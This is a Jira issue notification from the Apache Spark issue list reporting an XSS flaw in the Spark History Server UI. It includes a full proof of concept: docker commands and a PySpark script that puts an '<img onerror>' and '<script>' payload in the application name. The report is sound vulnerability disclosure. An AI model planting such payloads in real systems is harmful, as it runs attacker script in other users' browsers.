[jira] [Created] (SPARK-53337) XSS Vulnerability Fix in Spark Web

Wed, 20 Aug 2025 08:18:31 -0700 

Alexandre Pujol created SPARK-53337:
---------------------------------------

             Summary: XSS Vulnerability Fix in Spark Web
                 Key: SPARK-53337
                 URL: https://issues.apache.org/jira/browse/SPARK-53337
             Project: Spark
          Issue Type: Bug
          Components: Spark Core
    Affects Versions: 4.0.0, 3.5.6
            Reporter: Alexandre Pujol


We found an XSS injection in Spark Web 3.5.4. It is triggered on the 
application name in the job viewing interface. 

You will find below the full POC to re-create it using a simple docker 
container. Let us know if you need more details regarding this issue. 

Acknowledgment: This vulnerability has been found by Yann Gourio (cc'ed) 

### POC 

Start spark 3.5.4 in a container 
```sh 
mkdir spark-logs 
chmod 777 spark-logs 
docker run -it --rm -v "${PWD}/spark-logs:/spark-logs" 
spark:3.5.4-scala2.12-java17-python3-ubuntu /bin/bash 
``` 

Inside the container, generate the PySpark script with the payload in the 
application name. 
```sh 
cat <<EOF > script.py 

from pyspark.sql import SparkSession 

if __name__ == "__main__": 
   spark = SparkSession \ 
       .builder \ 
       .appName("<img src=x onerror=alert(/jedi master/)><script>alert({_}/Dark 
Vador/{_})</script>") \ 
       .getOrCreate() 

   print(spark.range(1000 * 1000 * 1000).count()) 

   spark.stop() 

EOF 
``` 

Still inside the container, start the application: 
```sh 
/opt/spark/bin/spark-submit --conf "spark.eventLog.enabled=true" --conf 
"spark.eventLog.dir=/spark-logs" script.py 
``` 

Now start the Spark History Server. 
```sh 
docker run -it --rm -p 18080:18080 -v "${PWD}/spark-logs:/spark-logs" -e 
"SPARK_HISTORY_OPTS='-Dspark.history.fs.logDirectory=/spark-logs'" -e 
"SPARK_NO_DAEMONIZE=TRUE" spark:3.5.4-scala2.12-java17-python3-ubuntu 
/opt/spark/sbin/start-history-server.sh 
``` 

On the host machine, open a browser and go to 
[http://localhost:18080|http://localhost:18080/]. You should see a JavaScript 
alert pop-up. 



--
This message was sent by Atlassian Jira
(v8.20.10#820010)

---------------------------------------------------------------------
To unsubscribe, e-mail: issues-unsubscr...@spark.apache.org
For additional commands, e-mail: issues-h...@spark.apache.org

Reply via email to